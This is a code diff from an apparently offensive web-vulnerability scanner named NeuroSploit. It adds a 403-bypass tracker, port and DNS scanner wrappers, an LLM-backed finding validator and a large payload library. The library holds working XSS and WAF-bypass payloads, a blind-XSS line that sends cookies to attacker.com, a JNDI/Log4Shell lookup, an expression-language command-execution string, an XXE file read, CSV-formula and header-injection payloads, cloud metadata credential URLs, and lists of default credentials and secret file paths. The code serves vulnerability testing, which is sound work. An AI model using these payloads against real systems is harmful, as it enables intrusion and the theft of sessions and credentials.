async def try_bypass_403(self, request_engine, url: str, method: str = "GET") -> Optional[Dict]:
"""Attempt 403 bypass with multiple techniques."""
ep = self._get_endpoint(url)
self._403_bypass_attempts[ep.url] = self._403_bypass_attempts.get(ep.url, 0) + 1
result = await BypassTechniques.attempt_bypass(
request_engine, url, original_method=method
)
if result:
self._bypass_successes.append({
"url": url,
"method": result.get("bypass_method", "unknown"),
"status": result.get("status", 0),
})
# Revive endpoint
ep.is_dead = False
ep.consecutive_failures = 0
logger.info(f"403 bypass success: {url} via {result.get('bypass_method')}")
return result
def get_dynamic_delay(self) -> float:
"""Get current recommended delay between requests."""
if self._rate_limit_detected:
return max(self._global_delay, 1.0)
return self._global_delay
def should_recompute_priorities(self) -> bool:
"""Check if it's time to recompute testing priorities."""
tests_since = self._global_test_count - self._last_adaptation_count
time_since = time.time() - self._last_adaptation_time
return tests_since >= self.ADAPTATION_INTERVAL or time_since >= 120
def recompute_priorities(self, vuln_types: List[str]) -> List[str]:
"""Recompute vuln type priority order based on observed results.
Promotes types with high success rates and deprioritizes failed types.
Returns reordered list of vuln types.
"""
self._last_adaptation_count = self._global_test_count
self._last_adaptation_time = time.time()
def type_score(vt):
vs = self._get_vuln_stats(vt)
if vs.total_tests == 0:
return 0.5 # Untested -- medium priority
# Weighted: success rate + bonus for confirmed findings
score = vs.success_rate * 0.6
if vs.confirmed_count > 0:
score += 0.3
# Penalty for WAF blocks
if vs.waf_block_count > vs.total_tests * 0.5:
score -= 0.2
return score
scored = [(vt, type_score(vt)) for vt in vuln_types]
scored.sort(key=lambda x: x[1], reverse=True)
reordered = [vt for vt, _ in scored]
logger.debug(f"Priority recomputed: {reordered[:5]}")
return reordered
def get_hot_endpoints(self) -> List[str]:
"""Get endpoints that have yielded multiple findings."""
return list(self._hot_endpoints)
def get_report_context(self) -> Dict:
"""Get strategy stats for report generation."""
dead_count = sum(1 for e in self._endpoints.values() if e.is_dead)
hot_count = len(self._hot_endpoints)
top_types = sorted(
self._vuln_stats.values(),
key=lambda v: v.confirmed_count,
reverse=True,
)[:5]
return {
"total_tests": self._global_test_count,
"total_findings": self._global_finding_count,
"endpoints_tested": len(self._endpoints),
"endpoints_dead": dead_count,
"endpoints_hot": hot_count,
"rate_limiting_detected": self._rate_limit_detected,
"bypass_successes": len(self._bypass_successes),
"bypass_details": self._bypass_successes[:10],
"top_vuln_types": [
{
"type": v.vuln_type,
"tests": v.total_tests,
"confirmed": v.confirmed_count,
"rate": f"{v.success_rate:.1%}",
}
for v in top_types
],
"hot_endpoints": list(self._hot_endpoints)[:10],
}
def get_endpoint_summary(self) -> Dict[str, Dict]:
"""Get summary of all tracked endpoints."""
return {
url: {
"tests": ep.total_tests,
"findings": ep.findings_count,
"dead": ep.is_dead,
"403s": ep.status_403_count,
"avg_response": round(ep.avg_response_time, 3),
}
for url, ep in self._endpoints.items()
}
+64
View File
@@ -135,6 +135,20 @@ class SecurityTool:
"command": "dalfox url {target} -o /opt/output/dalfox.txt --silence",
"output_file": "/opt/output/dalfox.txt",
"parser": "parse_dalfox_output"
},
"naabu": {
"name": "Naabu",
"description": "Fast port scanner",
"command": "naabu -host {host} -json -top-ports 1000 -silent -o /opt/output/naabu.json",
"output_file": "/opt/output/naabu.json",
"parser": "parse_naabu_output"
},
"dnsx": {
"name": "DNSX",
"description": "DNS toolkit",
"command": "echo {domain} | dnsx -silent -a -aaaa -cname -mx -ns -txt -o /opt/output/dnsx.txt",
"output_file": "/opt/output/dnsx.txt",
"parser": "parse_dnsx_output"
}
}
@@ -750,6 +764,56 @@ class DockerToolExecutor:
return findings
def parse_naabu_output(self, output: str, target: str) -> List[Dict]:
"""Parse naabu JSON output"""
findings = []
ports = []
for line in output.split('\n'):
if not line.strip():
continue
try:
data = json.loads(line)
host = data.get('host', data.get('ip', ''))
port = data.get('port', 0)
ports.append(str(port))
except json.JSONDecodeError:
# Text mode: host:port
match = re.match(r'^(.+?):(\d+)$', line.strip())
if match:
ports.append(match.group(2))
if ports:
findings.append({
"title": f"Open Ports Found: {len(ports)}",
"severity": "info",
"vulnerability_type": "Port Discovery",
"description": f"Found {len(ports)} open ports: {', '.join(ports[:20])}",
"affected_endpoint": target,
"evidence": f"Ports: {', '.join(ports)}",
"remediation": "Review exposed services and close unnecessary ports"
})
return findings
def parse_dnsx_output(self, output: str, target: str) -> List[Dict]:
"""Parse dnsx output"""
findings = []
records = [line.strip() for line in output.split('\n') if line.strip()]
if records:
findings.append({
"title": f"DNS Records: {len(records)}",
"severity": "info",
"vulnerability_type": "DNS Enumeration",
"description": f"DNS records found: {', '.join(records[:10])}",
"affected_endpoint": target,
"evidence": "\n".join(records[:20]),
"remediation": "Review DNS records for security issues"
})
return findings
# Global executor instance
_executor: Optional[DockerToolExecutor] = None
+321
View File
@@ -0,0 +1,321 @@
"""
NeuroSploit v3 - Validation Judge
Sole authority for approving or rejecting vulnerability findings.
No finding enters the confirmed list without passing through this judge.
Pipeline:
1. Run negative controls (benign payloads → compare responses)
2. Check proof of execution (per vuln type)
3. Get AI interpretation (BEFORE verdict, not after)
4. Calculate confidence score (0-100)
5. Apply verdict (confirmed/likely/rejected)
"""
import logging
from dataclasses import dataclass, field, asdict
from typing import Callable, Dict, List, Optional, Any
from backend.core.negative_control import NegativeControlEngine, NegativeControlResult
from backend.core.proof_of_execution import ProofOfExecution, ProofResult
from backend.core.confidence_scorer import ConfidenceScorer, ConfidenceResult
from backend.core.vuln_engine.system_prompts import get_prompt_for_vuln_type
from backend.core.access_control_learner import AccessControlLearner
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class JudgmentResult:
"""Complete judgment result from the ValidationJudge."""
approved: bool # Should this finding be accepted?
verdict: str # "confirmed" | "likely" | "rejected"
confidence_score: int # 0-100
confidence_breakdown: Dict[str, int] = field(default_factory=dict)
proof_of_execution: Optional[ProofResult] = None
negative_controls: Optional[NegativeControlResult] = None
ai_interpretation: Optional[str] = None
evidence_summary: str = "" # Hardened evidence string
rejection_reason: str = "" # Why was it rejected (if applicable)
# ---------------------------------------------------------------------------
# Judge
# ---------------------------------------------------------------------------
class ValidationJudge:
"""Sole authority for approving/rejecting vulnerability findings.
Orchestrates negative controls, proof of execution, AI interpretation,
and confidence scoring into a single JudgmentResult.
Usage:
judge = ValidationJudge(controls, proof, scorer, llm)
judgment = await judge.evaluate(
vuln_type, url, param, payload, test_response, baseline,
signals, evidence, make_request_fn
)
if judgment.approved:
# Create finding with judgment.confidence_score
else:
# Store as rejected finding with judgment.rejection_reason
"""
def __init__(
self,
negative_controls: NegativeControlEngine,
proof_engine: ProofOfExecution,
confidence_scorer: ConfidenceScorer,
llm=None,
access_control_learner: Optional[AccessControlLearner] = None,
):
self.controls = negative_controls
self.proof = proof_engine
self.scorer = confidence_scorer
self.llm = llm
self.acl_learner = access_control_learner
async def evaluate(
self,
vuln_type: str,
url: str,
param: str,
payload: str,
test_response: Dict,
baseline: Optional[Dict],
signals: List[str],
evidence: str,
make_request_fn: Callable,
method: str = "GET",
injection_point: str = "parameter",
) -> JudgmentResult:
"""Full evaluation pipeline.
Args:
vuln_type: Vulnerability type (e.g., "ssrf", "xss_reflected")
url: Target URL
param: Parameter being tested
payload: The attack payload used
test_response: HTTP response dict from the attack
baseline: Optional baseline response for comparison
signals: Signal names from multi_signal_verify (e.g., ["baseline_diff"])
evidence: Raw evidence string from verification
make_request_fn: Async fn(url, method, params) → response dict
method: HTTP method used
injection_point: Where payload was injected
Returns:
JudgmentResult with verdict, score, proof, controls, evidence
"""
# Step 1: Run negative controls
control_result = await self._run_controls(
url, param, method, vuln_type, test_response,
make_request_fn, baseline, injection_point
)
# Step 2: Check proof of execution
proof_result = self.proof.check(
vuln_type, payload, test_response, baseline
)
# Step 3: AI interpretation (BEFORE verdict)
ai_interp = await self._get_ai_interpretation(
vuln_type, payload, test_response
)
# Step 4: Calculate confidence score
confidence = self.scorer.calculate(
signals, proof_result, control_result, ai_interp
)
# Step 4b: Apply access control learning adjustment
if self.acl_learner:
try:
body = test_response.get("body", "") if isinstance(test_response, dict) else ""
status = test_response.get("status", 0) if isinstance(test_response, dict) else 0
hints = self.acl_learner.get_evaluation_hints(vuln_type, body, status)
if hints and hints.get("likely_false_positive") and hints.get("fp_signals", 0) >= 2:
fp_rate = self.acl_learner.get_false_positive_rate(vuln_type)
if fp_rate > 0.7:
# High historical FP rate + matching FP pattern → penalize
penalty = -20
confidence.score = max(0, confidence.score + penalty)
confidence.breakdown["acl_learning_penalty"] = penalty
confidence.detail += f"; ACL learning penalty ({penalty}pts, FP rate: {fp_rate:.0%})"
# Recalculate verdict
if confidence.score >= self.scorer.THRESHOLD_CONFIRMED:
confidence.verdict = "confirmed"
elif confidence.score >= self.scorer.THRESHOLD_LIKELY:
confidence.verdict = "likely"
else:
confidence.verdict = "rejected"
except Exception:
pass
# Step 5: Build judgment
approved = confidence.verdict != "rejected"
# Build evidence summary
evidence_summary = self._build_evidence_summary(
evidence, proof_result, control_result, confidence, ai_interp
)
# Build rejection reason if applicable
rejection_reason = ""
if not approved:
rejection_reason = self._build_rejection_reason(
vuln_type, param, proof_result, control_result,
confidence, ai_interp
)
return JudgmentResult(
approved=approved,
verdict=confidence.verdict,
confidence_score=confidence.score,
confidence_breakdown=confidence.breakdown,
proof_of_execution=proof_result,
negative_controls=control_result,
ai_interpretation=ai_interp,
evidence_summary=evidence_summary,
rejection_reason=rejection_reason,
)
async def _run_controls(
self,
url: str,
param: str,
method: str,
vuln_type: str,
attack_response: Dict,
make_request_fn: Callable,
baseline: Optional[Dict],
injection_point: str,
) -> Optional[NegativeControlResult]:
"""Run negative controls with error handling."""
try:
return await self.controls.run_controls(
url, param, method, vuln_type, attack_response,
make_request_fn, baseline, injection_point
)
except Exception as e:
logger.debug(f"Negative controls failed: {e}")
return None
async def _get_ai_interpretation(
self,
vuln_type: str,
payload: str,
response: Dict,
) -> Optional[str]:
"""Get AI interpretation of the response (BEFORE verdict)."""
if not self.llm or not self.llm.is_available():
return None
try:
body = response.get("body", "")[:1000]
status = response.get("status", 0)
# Inject access control learning hints for relevant vuln types
acl_hint = ""
if self.acl_learner:
hints = self.acl_learner.get_evaluation_hints(vuln_type, body, status)
if hints and hints.get("matching_patterns", 0) > 0:
fp_label = "LIKELY FALSE POSITIVE" if hints["likely_false_positive"] else "POSSIBLY REAL"
acl_hint = (
f"\n\n**Learned Pattern Hints:** {fp_label} "
f"(pattern: {hints['pattern_type']}, "
f"FP signals: {hints['fp_signals']}, TP signals: {hints['tp_signals']})\n"
f"IMPORTANT: For access control vulns (BOLA/BFLA/IDOR), do NOT rely on "
f"HTTP status codes. Compare actual response DATA — check if different "
f"user's private data is returned vs. denial/empty/own-data patterns."
)
prompt = f"""Briefly analyze this HTTP response after testing for {vuln_type.upper()}.
Payload sent: {payload[:200]}
Response status: {status}
Response excerpt:
```
{body}
```
{acl_hint}
Answer in 1-2 sentences: Was the payload processed/executed? Or was it ignored/filtered/blocked? Be specific about what happened."""
system = get_prompt_for_vuln_type(vuln_type, "interpretation")
result = await self.llm.generate(prompt, system)
return result.strip()[:300] if result else None
except Exception:
return None
def _build_evidence_summary(
self,
raw_evidence: str,
proof: Optional[ProofResult],
controls: Optional[NegativeControlResult],
confidence: ConfidenceResult,
ai_interp: Optional[str],
) -> str:
"""Build hardened evidence string with all verification components."""
parts = []
# Raw evidence
if raw_evidence:
parts.append(raw_evidence)
# Proof of execution
if proof:
if proof.proven:
parts.append(f"[PROOF] {proof.proof_type}: {proof.detail}")
else:
parts.append(f"[NO PROOF] {proof.detail}")
# Negative controls
if controls:
parts.append(f"[CONTROLS] {controls.detail}")
# AI interpretation
if ai_interp:
parts.append(f"[AI] {ai_interp}")
# Confidence score
parts.append(f"[CONFIDENCE] {confidence.score}/100 [{confidence.verdict}]")
return " | ".join(parts)
def _build_rejection_reason(
self,
vuln_type: str,
param: str,
proof: Optional[ProofResult],
controls: Optional[NegativeControlResult],
confidence: ConfidenceResult,
ai_interp: Optional[str],
) -> str:
"""Build clear rejection reason explaining why finding was rejected."""
reasons = []
if proof and not proof.proven:
reasons.append("no proof of execution")
if controls and controls.same_behavior:
reasons.append(
f"negative controls show same behavior "
f"({controls.controls_matching}/{controls.controls_run} controls match)"
)
if ai_interp:
ineffective_kws = ["ignored", "not processed", "blocked", "filtered",
"sanitized", "no effect"]
if any(kw in ai_interp.lower() for kw in ineffective_kws):
reasons.append(f"AI confirms payload was ineffective")
reason_str = "; ".join(reasons) if reasons else "confidence too low"
return (f"Rejected {vuln_type} in {param}: {reason_str} "
f"(score: {confidence.score}/100)")
+9 -1
View File
@@ -1,5 +1,13 @@
from backend.core.vuln_engine.engine import DynamicVulnerabilityEngine
from backend.core.vuln_engine.registry import VulnerabilityRegistry
from backend.core.vuln_engine.payload_generator import PayloadGenerator
def __getattr__(name):
"""Lazy import for DynamicVulnerabilityEngine (requires database models)"""
if name == "DynamicVulnerabilityEngine":
from backend.core.vuln_engine.engine import DynamicVulnerabilityEngine
return DynamicVulnerabilityEngine
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
__all__ = ["DynamicVulnerabilityEngine", "VulnerabilityRegistry", "PayloadGenerator"]
File diff suppressed because it is too large Load Diff
+617 -5
View File
@@ -48,11 +48,129 @@ class PayloadGenerator:
"<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>",
],
"xss_stored": [
"<script>alert('StoredXSS')</script>",
"<img src=x onerror=alert('StoredXSS')>",
"<svg onload=alert('StoredXSS')>",
"javascript:alert('StoredXSS')",
"<a href=javascript:alert('StoredXSS')>click</a>",
# Basic script tags
"<script>alert(1)</script>",
"<script>alert(document.domain)</script>",
"<script>alert(String.fromCharCode(88,83,83))</script>",
"<Script>alert(1)</Script>",
"<scr<script>ipt>alert(1)</scr</script>ipt>",
"<script/src=data:,alert(1)>",
"<script>alert`1`</script>",
# IMG event handlers
"<img src=x onerror=alert(1)>",
"<img src=x onerror=alert(document.domain)>",
"<img/src=x onerror=alert(1)>",
"<img src=1 onerror='alert(1)'>",
"<IMG SRC=x ONERROR=alert(1)>",
"<img src onerror=alert(1)>",
"<img src=x onerror=prompt(1)>",
"<img src=x onerror=confirm(1)>",
# SVG event handlers
"<svg onload=alert(1)>",
"<svg/onload=alert(1)>",
"<svg onload=alert(document.domain)>",
"<svg><script>alert(1)</script></svg>",
"<svg><animate onbegin=alert(1)>",
"<svg><set onbegin=alert(1)>",
# Other element events
"<body onload=alert(1)>",
"<input onfocus=alert(1) autofocus>",
"<input onblur=alert(1) autofocus><input autofocus>",
"<details open ontoggle=alert(1)>",
"<marquee onstart=alert(1)>",
"<video><source onerror=alert(1)>",
"<audio src=x onerror=alert(1)>",
"<video src=x onerror=alert(1)>",
"<select onfocus=alert(1) autofocus>",
"<textarea onfocus=alert(1) autofocus>",
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<div contenteditable onblur=alert(1)>click then lose focus</div>",
# Anchor/link
"<a href=javascript:alert(1)>click</a>",
"<a href='javascript:alert(1)'>click me</a>",
"<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)>click</a>",
"<iframe src=javascript:alert(1)>",
"<embed src=javascript:alert(1)>",
# Attribute escape + event handlers
'" onfocus=alert(1) autofocus x="',
"' onfocus=alert(1) autofocus x='",
'"><script>alert(1)</script>',
"'><script>alert(1)</script>",
'" onmouseover=alert(1) x="',
"' onmouseover=alert(1) x='",
'"><img src=x onerror=alert(1)>',
"'><img src=x onerror=alert(1)>",
'" autofocus onfocus=alert(1) x="',
# JavaScript context breakout
"</script><script>alert(1)</script>",
"';alert(1)//",
'";alert(1)//',
"'-alert(1)-'",
'"-alert(1)-"',
"\\\\';;alert(1)//",
"${alert(1)}",
"</script><img src=x onerror=alert(1)>",
# Encoding bypasses
"%3Cscript%3Ealert(1)%3C/script%3E",
"&#60;script&#62;alert(1)&#60;/script&#62;",
"&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
"<script>al\\u0065rt(1)</script>",
"<scr\\x00ipt>alert(1)</scr\\x00ipt>",
"javas\\tcript:alert(1)",
# WAF/filter bypass
"<img src=x onerror=alert`1`>",
"<img src=x onerror=window['alert'](1)>",
"<img src=x onerror=self['alert'](1)>",
"<img src=x onerror=top['al'+'ert'](1)>",
"<img src=x onerror=[].constructor.constructor('alert(1)')()>",
"<img src=x onerror=Function('alert(1)')()>",
"<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
"<svg><animatetransform onbegin=alert(1)>",
"<style>@keyframes x{}</style><xss style='animation-name:x' onanimationend='alert(1)'>",
"<form><button formaction=javascript:alert(1)>X</button></form>",
"<object data=javascript:alert(1)>",
"<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>",
],
# XSS Context-Specific Payloads
"xss_context_html_body": [
"<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"<svg onload=alert(1)>",
"<details open ontoggle=alert(1)>",
"<input onfocus=alert(1) autofocus>",
"<body onload=alert(1)>",
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<video><source onerror=alert(1)>",
],
"xss_context_attribute": [
'" onfocus=alert(1) autofocus x="',
"' onfocus=alert(1) autofocus x='",
'"><script>alert(1)</script>',
"'><script>alert(1)</script>",
'" onmouseover=alert(1) x="',
'"><img src=x onerror=alert(1)>',
'" autofocus onfocus=alert(1) x="',
"' autofocus onfocus=alert(1) x='",
],
"xss_context_js_string": [
"';alert(1)//",
'";alert(1)//',
"</script><script>alert(1)</script>",
"'-alert(1)-'",
"\\\\';;alert(1)//",
"</script><img src=x onerror=alert(1)>",
],
"xss_context_template_literal": [
"${alert(1)}",
"${alert(document.domain)}",
"${[].constructor.constructor('alert(1)')()}",
],
"xss_context_href": [
"javascript:alert(1)",
"javascript:alert(document.domain)",
"&#106;avascript:alert(1)",
"java%0ascript:alert(1)",
"data:text/html,<script>alert(1)</script>",
],
"xss_dom": [
"#<script>alert('DOMXSS')</script>",
@@ -282,8 +400,502 @@ class PayloadGenerator:
"test",
"../1",
],
# ===== NEW PAYLOAD LIBRARIES (68 new types) =====
# Advanced Injection
"ldap_injection": [
"*", ")(cn=*)", ")(|(cn=*", "*)(uid=*))(|(uid=*",
"admin)(&)", ")(|(password=*)", "*)(objectClass=*",
],
"xpath_injection": [
"' or '1'='1", "' or ''='", "'] | //user/* | //user['",
"' and count(//user)>0 and '1'='1",
],
"graphql_injection": [
'{__schema{types{name,fields{name,type{name}}}}}',
'{__type(name:"User"){fields{name}}}',
'{"query":"mutation{updateUser(role:\\"admin\\"){id}}"}',
],
"crlf_injection": [
"%0d%0aX-Injected:neurosploit", "%0d%0aSet-Cookie:evil=1",
"%0d%0a%0d%0a<html>injected", "\\r\\nX-Test:1",
"%0d%0aLocation:http://evil.com",
],
"header_injection": [
"evil.com", "%0d%0aInjected:true",
"target.com\r\nX-Injected: true", "evil.com%00.target.com",
],
"email_injection": [
"test@test.com%0d%0aCc:attacker@evil.com",
"test@test.com%0d%0aBcc:spy@evil.com",
"test@test.com%0aSubject:Hacked",
],
"expression_language_injection": [
"${7*7}", "#{7*7}", "${applicationScope}",
"${T(java.lang.Runtime).getRuntime().exec('id')}",
"${pageContext.request.serverName}",
],
"log_injection": [
"test%0aINFO:Admin_logged_in",
"${jndi:ldap://attacker.com/a}",
"test%0a%0aNEW_LOG_ENTRY",
"\\x1b[31mRED_TEXT",
],
"html_injection": [
"<h1>INJECTED</h1>", "<b>neurosploit_test</b>",
"<img src=x>", "<form action='http://evil.com'><input name=pw><input type=submit>",
"<a href='http://evil.com'>Click Here</a>",
],
"csv_injection": [
"=cmd|'/C calc'!A0", "=1+1", "+1+1", "@SUM(1+1)",
'=HYPERLINK("http://evil.com","Click")',
"-1+1", '=IMPORTXML("http://evil.com","//a")',
],
"orm_injection": [
"field__gt=0", "field__contains=admin", "field__regex=.*",
"' OR '1'='1", "field[$ne]=",
],
# XSS Advanced
"blind_xss": [
"<script src=//callback.attacker.com></script>",
"'><script>new Image().src='//attacker.com/?c='+document.cookie</script>",
"<img src=//callback.attacker.com/blind>",
],
"mutation_xss": [
"<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>",
"<svg></p><style><a id=\"</style><img src=1 onerror=alert(1)>\">",
"<noscript><p title=\"</noscript><img src=x onerror=alert(1)>\">",
],
# File Access Advanced
"arbitrary_file_read": [
"/etc/passwd", "/etc/shadow", "../../../.env",
"../../config/database.yml", "/proc/self/environ",
"~/.ssh/id_rsa", "C:\\Windows\\win.ini",
],
"arbitrary_file_delete": [
"../../../tmp/test_delete", "../../.htaccess",
"../../../tmp/neurosploit_test",
],
"zip_slip": [
"../../tmp/zipslip_test.txt",
"../../../var/www/html/shell.php",
"../../../../tmp/zipslip_proof",
],
# Auth Advanced
"weak_password": [
"123456", "password", "abc123", "qwerty",
"aaaaaa", "12345678", "Password1", "test",
],
"default_credentials": [
"admin:admin", "admin:password", "root:root",
"test:test", "admin:admin123", "user:user",
"admin:changeme", "admin:default",
],
"two_factor_bypass": [
"000000", "123456", "skip_2fa=true",
"verify=false", "step=3",
],
"oauth_misconfiguration": [
"redirect_uri=https://evil.com",
"redirect_uri=https://target.com.evil.com",
"redirect_uri=https://target.com/callback?next=evil.com",
],
# Authorization Advanced
"bfla": [
"/api/admin/users", "/api/admin/settings",
"/api/admin/create-user", "/admin/config",
],
"mass_assignment": [
'{"role":"admin"}', '{"is_admin":true}',
'{"verified":true}', '{"balance":99999}',
'{"account_type":"premium"}',
],
"forced_browsing": [
"/admin", "/dashboard", "/api/admin",
"/internal", "/debug", "/console",
"/actuator", "/swagger-ui.html", "/.git/config",
"/.env", "/backup.sql", "/phpinfo.php",
],
# Client-Side Advanced
"dom_clobbering": [
'<img id="x" src="evil.com">',
'<form id="x"><input id="y" value="evil"></form>',
'<a id="CONFIG" href="evil://payload">',
],
"postmessage_vulnerability": [
'window.postMessage("inject","*")',
'window.postMessage(\'{"cmd":"getToken"}\',\'*\')',
],
"websocket_hijacking": [
"new WebSocket('wss://target.com/ws')",
],
"prototype_pollution": [
'{"__proto__":{"isAdmin":true}}',
'{"constructor":{"prototype":{"polluted":true}}}',
'?__proto__[isAdmin]=true',
'?__proto__[test]=polluted',
],
"css_injection": [
"color:red;background:url(//evil.com/test)",
"};body{background:red}",
"input[value^='a']{background:url(//evil.com/a)}",
],
"tabnabbing": [
'<a target="_blank" href="http://test.com">Test</a>',
],
# Infrastructure Advanced
"directory_listing": [
"/images/", "/uploads/", "/backup/",
"/static/", "/assets/", "/media/",
"/files/", "/docs/", "/data/", "/logs/",
],
"debug_mode": [
"/nonexistent_page_404_test", "/?debug=true",
"/phpinfo.php", "/actuator/env",
"/debug/pprof", "/__debug__/",
],
"exposed_admin_panel": [
"/admin", "/administrator", "/admin/login",
"/wp-admin", "/cpanel", "/phpmyadmin",
"/adminer", "/manager/html", "/jenkins",
],
"exposed_api_docs": [
"/swagger-ui.html", "/swagger-ui/", "/api-docs",
"/openapi.json", "/swagger.json", "/graphql",
"/graphiql", "/redoc", "/v1/api-docs",
],
"insecure_cookie_flags": [], # Inspection-based, no payloads
"http_smuggling": [
"Content-Length: 6\r\nTransfer-Encoding: chunked",
"Transfer-Encoding: xchunked",
],
"cache_poisoning": [
"X-Forwarded-Host: evil.com",
"X-Forwarded-Scheme: nothttps",
"X-Original-URL: /admin",
],
# Logic & Data
"race_condition": [], # Requires concurrent requests, not payloads
"business_logic": [
"-1", "0", "0.001", "99999999",
"-99999", "NaN", "null", "undefined",
],
"rate_limit_bypass": [
"X-Forwarded-For: 1.2.3.4",
"X-Real-IP: 1.2.3.4",
"X-Originating-IP: 1.2.3.4",
],
"parameter_pollution": [
"param=safe&param=malicious",
"param[]=a&param[]=b",
],
"type_juggling": [
"0", "true", "[]", "null",
'{"password":0}', '{"password":true}',
],
"insecure_deserialization": [
"rO0ABXNyAA...", # Java serialization marker
'O:4:"User":1:{s:4:"role";s:5:"admin";}', # PHP
"gASVDAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg==", # Python pickle
],
"subdomain_takeover": [], # DNS-based, not payloads
"host_header_injection": [
"evil.com", "target.com:evil.com@evil.com",
"evil.com%0d%0aX-Injected:true",
],
"timing_attack": [], # Time-measurement based
"improper_error_handling": [
"' \"", "{{invalid}}", "<>!@#$%^&*()",
"a" * 10000, "\x00\x01\x02", "NaN", "undefined",
],
"sensitive_data_exposure": [], # Inspection-based
"information_disclosure": [
"/.git/config", "/.git/HEAD", "/.svn/entries",
"/.env", "/robots.txt", "/sitemap.xml",
"/crossdomain.xml", "/.DS_Store",
],
"api_key_exposure": [], # JS analysis, not payloads
"source_code_disclosure": [
"/.git/config", "/.git/HEAD", "/app.js.map",
"/main.js.map", "/index.php.bak", "/config.php~",
"/web.config.old", "/backup.zip",
],
"backup_file_exposure": [
"/backup.sql", "/dump.sql", "/database.sql",
"/backup.zip", "/backup.tar.gz", "/site.zip",
"/db_backup.sql", "/backup/latest.sql",
],
"version_disclosure": [], # Header inspection
# Crypto & Supply
"weak_encryption": [], # TLS inspection
"weak_hashing": [], # Hash analysis
"weak_random": [], # Token collection
"cleartext_transmission": [], # HTTP inspection
"vulnerable_dependency": [], # Version fingerprinting
"outdated_component": [
"/readme.html", "/CHANGELOG.md", "/VERSION",
"/license.txt",
],
"insecure_cdn": [], # Script tag inspection
"container_escape": [], # Container inspection
# Cloud & API
"s3_bucket_misconfiguration": [], # External check
"cloud_metadata_exposure": [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://metadata.google.internal/computeMetadata/v1/",
],
"serverless_misconfiguration": [], # Config inspection
"graphql_introspection": [
'{__schema{queryType{name},mutationType{name},types{name,kind,fields{name,type{name,kind,ofType{name}}}}}}',
'{__type(name:"User"){fields{name,type{name}}}}',
],
"graphql_dos": [
'{"query":"{' + 'user{posts{comments{author' * 5 + '}}}}}' + '}' * 4 + '"}',
],
"rest_api_versioning": [
"/api/v1/", "/api/v0/", "/v1/", "/api/1.0/",
],
"soap_injection": [
"?wsdl",
'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Envelope><soap:Body>&xxe;</soap:Body></soap:Envelope>',
],
"api_rate_limiting": [], # Rapid request testing
"excessive_data_exposure": [], # Response analysis
# ===== XSS BYPASS PAYLOAD LIBRARIES =====
"xss_bypass_event_handlers": [
"<svg onload=alert(1)>",
"<body onload=alert(1)>",
"<input onfocus=alert(1) autofocus>",
"<details open ontoggle=alert(1)>",
"<marquee onstart=alert(1)>",
"<video><source onerror=alert(1)>",
"<audio src=x onerror=alert(1)>",
"<select onfocus=alert(1) autofocus>",
"<textarea onfocus=alert(1) autofocus>",
"<input onblur=alert(1) autofocus><input autofocus>",
"<div contenteditable onblur=alert(1)>x</div>",
"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
"<svg><set onbegin=alert(1) attributename=x to=1>",
"<svg><animatetransform onbegin=alert(1) attributename=x>",
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<xss id=x onfocus=alert(1) tabindex=1>#x</xss>",
"<input type=image src=x onerror=alert(1)>",
"<object data=x onerror=alert(1)>",
"<style>@keyframes x{}</style><xss style='animation-name:x' onanimationend=alert(1)>",
"<xss onpointerover=alert(1)>hover</xss>",
],
"xss_bypass_custom_tags": [
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<xss id=x onfocus=alert(1) tabindex=1>#x</xss>",
"<xss onpointerover=alert(1)>hover me</xss>",
"<xss onfocusin=alert(1) tabindex=1>focus me</xss>",
"<custom autofocus tabindex=1 onfocus=alert(1)></custom>",
"<math><mi onfocus=alert(1) tabindex=1>x</mi></math>",
"<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click</text></a></svg>",
"<svg><discard onbegin=alert(1)>",
"<svg><animate onbegin=alert(1) attributeName=x>",
],
"xss_bypass_alert_blocked": [
"<img src=x onerror=confirm(1)>",
"<img src=x onerror=prompt(1)>",
"<img src=x onerror=print()>",
"<img src=x onerror=alert`1`>",
"<img src=x onerror=window['al'+'ert'](1)>",
"<img src=x onerror=self['alert'](1)>",
"<img src=x onerror=top['alert'](1)>",
"<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
"<img src=x onerror=eval('\\141\\154\\145\\162\\164(1)')>",
"<img src=x onerror=Function('alert(1)')()>",
"<img src=x onerror=[].constructor.constructor('alert(1)')()>",
"<img src=x onerror=setTimeout('alert(1)')>",
],
"xss_bypass_encoding": [
"<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>",
"<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;>",
"<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)>click</a>",
"<a href=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(1)>click</a>",
"<a href=java%0ascript:alert(1)>click</a>",
"<a href=java%09script:alert(1)>click</a>",
"<a href=java%0dscript:alert(1)>click</a>",
"<svg onload=al\\u0065rt(1)>",
"<img src=x onerror=al\\u0065rt(1)>",
],
"xss_bypass_waf": [
"<Img Src=x OnError=alert(1)>",
"<IMG SRC=x ONERROR=alert(1)>",
"<img/src=x/onerror=alert(1)>",
"<img\\tsrc=x\\tonerror=alert(1)>",
"<img\\nsrc=x\\nonerror=alert(1)>",
"<<script>alert(1)//<</script>",
